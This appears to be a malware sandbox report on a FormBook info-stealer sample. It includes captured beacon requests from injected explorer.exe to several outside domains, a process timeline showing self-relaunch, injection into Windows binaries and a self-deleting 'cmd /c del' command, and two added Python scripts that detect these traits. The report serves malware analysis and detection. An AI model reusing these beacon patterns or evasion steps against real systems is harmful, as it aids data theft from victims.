Date: Wed, 12 May 2021 05:36:47 GMT
Content-Type: text/html
Content-Length: 169
Connection: close
Location: https://topcasino-111.org/or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.19.4</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49737 | 154.84.101.247 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 07:36:53.337873936 CEST | 6070 | OUT | GET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1
Host: www.shebagholdings.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 07:36:54.001211882 CEST | 6070 | IN | HTTP/1.1 404 Not Found
Transfer-Encoding: chunked
Server: IIS Microsoft-HTTPAPI/2.0
X-Powered-By: IIS
Date: Wed, 12 May 2021 05:36:53 GMT
Connection: close
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                        Session ID:5
                                                        Source IP:192.168.2.3
                                                        Source Port:49738
                                                        Destination IP:64.190.62.111
                                                        Destination Port:80
                                                        Process:C:\Windows\explorer.exe
                                                        Timestamp:May 12, 2021 07:36:58.988852024 CEST
                                                        kBytes transferred:6071
                                                        Direction:OUT
                                                        Data:GET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1
                                                        Host: www.booweats.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Timestamp:May 12, 2021 07:36:59.068284035 CEST
                                                        kBytes transferred:6072
                                                        Direction:IN
                                                        Data:HTTP/1.1 302 Found
                                                        date: Wed, 12 May 2021 05:36:59 GMT
                                                        content-type: text/html; charset=UTF-8
                                                        content-length: 0
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0IkIReecyedsKP0Z3ZUlN8WfOeeXlS8fzoYUbPSm0tTmZySD2nnP3pCqIeh4W5JzjK4yuWca9nv5u9W/WSUVrA==
                                                        expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        pragma: no-cache
                                                        last-modified: Wed, 12 May 2021 05:36:59 GMT
                                                        location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                        x-cache-miss-from: parking-5cc4cbb56f-gdph7
                                                        server: NginX
                                                        connection: close


                                                        Session ID:6
                                                        Source IP:192.168.2.3
                                                        Source Port:49741
                                                        Destination IP:34.102.136.180
                                                        Destination Port:80
                                                        Process:C:\Windows\explorer.exe
                                                        Timestamp:May 12, 2021 07:37:04.217828035 CEST
                                                        kBytes transferred:6090
                                                        Direction:OUT
                                                        Data:GET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1
                                                        Host: www.xn--espacesacr-k7a.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Timestamp:May 12, 2021 07:37:04.354921103 CEST
                                                        kBytes transferred:6091
                                                        Direction:IN
                                                        Data:HTTP/1.1 403 Forbidden
                                                        Server: openresty
                                                        Date: Wed, 12 May 2021 05:37:04 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 275
                                                        ETag: "609953af-113"
                                                        Via: 1.1 google
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
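The three requests in sessions 4 to 6 share one shape: explorer.exe, not a browser, issues a GET to /or4i/ with two query parameters (KdTL and iN6) carrying base64-like values, sends no User-Agent, appends seven zero bytes as a request body, and is answered with a 404, 302 or 403. FormBook cycles through a list of hostnames of which most are decoys, so a detection should key on the request shape rather than on the Host. The Python below is an added example, not sandbox code: it parses each captured request and scores those traits. The fixture reproduces the three requests from the sessions above and adds one constructed benign request as a control; the INJECTED_HOSTS set is an assumption limited to the two system binaries this report shows carrying FormBook code.

```python
import re
from urllib.parse import urlsplit

# Request text and originating process copied from sessions 4-6 of this report;
# the last record is a constructed benign request used as a control.
SESSIONS = [
    (r"C:\Windows\explorer.exe",
     "GET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1\r\n"
     "Host: www.shebagholdings.com\r\nConnection: close\r\n\r\n", b"\x00" * 7),
    (r"C:\Windows\explorer.exe",
     "GET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1\r\n"
     "Host: www.booweats.com\r\nConnection: close\r\n\r\n", b"\x00" * 7),
    (r"C:\Windows\explorer.exe",
     "GET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1\r\n"
     "Host: www.xn--espacesacr-k7a.com\r\nConnection: close\r\n\r\n", b"\x00" * 7),
    # Constructed control: a normal browser fetch, should score zero.
    (r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
     "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n", b""),
]

_PATH_RE = re.compile(r"^/[A-Za-z0-9]{4}/$")          # /or4i/
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")       # base64 alphabet only
# Assumption: only the two hosts this report shows FormBook living in.
INJECTED_HOSTS = {"explorer.exe", "wlanext.exe"}


def parse_request(raw):
    """Split an HTTP/1.1 request head into (method, target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def query_params(query):
    """Split the query by hand: urllib's parse_qsl would turn '+' into a space
    and break the base64-alphabet check on the values."""
    params = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            params.append((name, value))
    return params


def beacon_indicators(process, raw, body=b""):
    """Return the FormBook beacon traits present in one captured request."""
    method, target, headers = parse_request(raw)
    url = urlsplit(target)
    params = query_params(url.query)
    hits = []
    if (_PATH_RE.match(url.path) and len(params) == 2
            and all(_B64_RE.match(v) for _, v in params)):
        hits.append("4-char path with two base64-like query values")
    if "user-agent" not in headers:
        hits.append("no User-Agent")
    if method == "GET" and body and set(body) == {0}:
        hits.append("GET with %d-byte all-zero body" % len(body))
    if process.rsplit("\\", 1)[-1].lower() in INJECTED_HOSTS:
        hits.append("sent by " + process)
    return hits


def is_formbook_beacon(process, raw, body=b""):
    """The URI shape alone is too weak (any short path with two parameters
    matches), so require it plus at least one behavioural trait."""
    hits = beacon_indicators(process, raw, body)
    uri_hit = any(h.startswith("4-char") for h in hits)
    return uri_hit and len(hits) >= 2


def scan(sessions=SESSIONS):
    """Host header of every session classified as a beacon."""
    return [parse_request(raw)[2].get("host")
            for proc, raw, body in sessions if is_formbook_beacon(proc, raw, body)]


if __name__ == "__main__":
    for proc, raw, body in SESSIONS:
        print(parse_request(raw)[2].get("host"), beacon_indicators(proc, raw, body))
```

Run against a proxy or PCAP export, the value of this check is the combination: a system process with no User-Agent, a GET that carries a body, and the two-parameter URI. Any one of them on its own is noisy; all three together on three different hosts in ten seconds is the decoy rotation this report captured.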


                                                        Behavior


                                                        System Behavior

                                                        General

                                                        Start time:07:35:08
                                                        Start date:12/05/2021
                                                        Path:C:\Users\user\Desktop\INV74321.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x400000
                                                        File size:579490 bytes
                                                        MD5 hash:877BB5661FE79BB7F48CFB3EA54537A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:07:35:09
                                                        Start date:12/05/2021
                                                        Path:C:\Users\user\Desktop\INV74321.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x400000
                                                        File size:579490 bytes
                                                        MD5 hash:877BB5661FE79BB7F48CFB3EA54537A0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:07:35:15
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:
                                                        Imagebase:0x7ff714890000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:07:35:29
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\SysWOW64\wlanext.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                        Imagebase:0xd90000
                                                        File size:78848 bytes
                                                        MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        General

                                                        Start time:07:35:34
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\INV74321.exe'
                                                        Imagebase:0x1f0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:07:35:34
                                                        Start date:12/05/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6b2800000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
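Read top to bottom, the six records above are the FormBook execution chain: the sample starts itself a second time one second later (the suspended-create and hollowing signatures from the overview), the hollowed copy moves into the 64-bit explorer.exe, explorer.exe spawns the 32-bit wlanext.exe whose memory then matches the FormBook rules although the binary on disk is a legitimate Windows component, and cmd.exe deletes the original file from the desktop. The report does not list parent process IDs, so the Python below (an added example, not Joe Sandbox code) works purely from the timeline. It parses the report's own "Key:Value" layout and applies three rules; the fixture is a constructed copy of the six records trimmed to the fields the rules need, with the Yara source identifiers left out.

```python
import re
from datetime import datetime, timedelta

# Constructed fixture: the six records of this report's System Behavior
# section, trimmed to the fields the rules use, in the page's own layout.
REPORT = r"""
General
Start time:07:35:08
Path:C:\Users\user\Desktop\INV74321.exe
Commandline:'C:\Users\user\Desktop\INV74321.exe'
MD5 hash:877BB5661FE79BB7F48CFB3EA54537A0
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Reputation:low

General
Start time:07:35:09
Path:C:\Users\user\Desktop\INV74321.exe
Commandline:'C:\Users\user\Desktop\INV74321.exe'
MD5 hash:877BB5661FE79BB7F48CFB3EA54537A0
Yara matches:
• Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Reputation:low

General
Start time:07:35:15
Path:C:\Windows\explorer.exe
Commandline:
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Reputation:high

General
Start time:07:35:29
Path:C:\Windows\SysWOW64\wlanext.exe
Commandline:C:\Windows\SysWOW64\wlanext.exe
MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Reputation:moderate

General
Start time:07:35:34
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:/c del 'C:\Users\user\Desktop\INV74321.exe'
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Reputation:high

General
Start time:07:35:34
Path:C:\Windows\System32\conhost.exe
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Reputation:high
"""


def parse_processes(report):
    """Turn the 'General' blocks into dicts; Yara rule names go into 'yara'."""
    procs, cur = [], None
    for line in report.splitlines():
        line = line.strip()
        if line == "General":
            cur = {"yara": []}
            procs.append(cur)
        elif cur is None or not line:
            continue
        elif line.startswith("• Rule:"):
            cur["yara"].append(line[len("• Rule:"):].split(",", 1)[0].strip())
        elif ":" in line:
            key, _, value = line.partition(":")
            cur[key.strip().lower()] = value.strip()
    return procs


def _start(p):
    return datetime.strptime(p["start time"], "%H:%M:%S")


def relaunched_self(procs, window=timedelta(seconds=5)):
    """Same path and MD5 started twice within `window`: the trace a copy of the
    sample created suspended and then hollowed leaves in a process timeline."""
    hits = []
    for i, a in enumerate(procs):
        for b in procs[i + 1:]:
            same_image = (a["path"].lower(), a.get("md5 hash")) == \
                         (b["path"].lower(), b.get("md5 hash"))
            if same_image and _start(b) - _start(a) <= window:
                hits.append(a["path"])
    return hits


def self_delete(procs):
    """cmd.exe /c del of an image that ran earlier in the same timeline."""
    images = {p["path"].lower() for p in procs}
    hits = []
    for p in procs:
        if p["path"].lower().endswith("\\cmd.exe"):
            m = re.search(r"/c\s+del\s+'([^']+)'", p.get("commandline", ""), re.I)
            if m and m.group(1).lower() in images:
                hits.append(m.group(1))
    return hits


def injected_system_binaries(procs):
    """Images under the Windows directory whose memory hits a FormBook rule:
    the code was injected, it is not what the file on disk contains."""
    return [p["path"] for p in procs
            if p["path"].lower().startswith("c:\\windows\\")
            and any("formbook" in r.lower() for r in p["yara"])]


PROCS = parse_processes(REPORT)

if __name__ == "__main__":
    print("relaunched:", relaunched_self(PROCS))
    print("self-delete:", self_delete(PROCS))
    print("injected:", injected_system_binaries(PROCS))
```

The third rule is the one worth carrying into production: a Yara or memory-scan hit on FormBook inside explorer.exe or a SysWOW64 binary with a moderate or high reputation is injection by definition, and unlike the relaunch rule it cannot be tripped by a legitimate updater that restarts itself.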
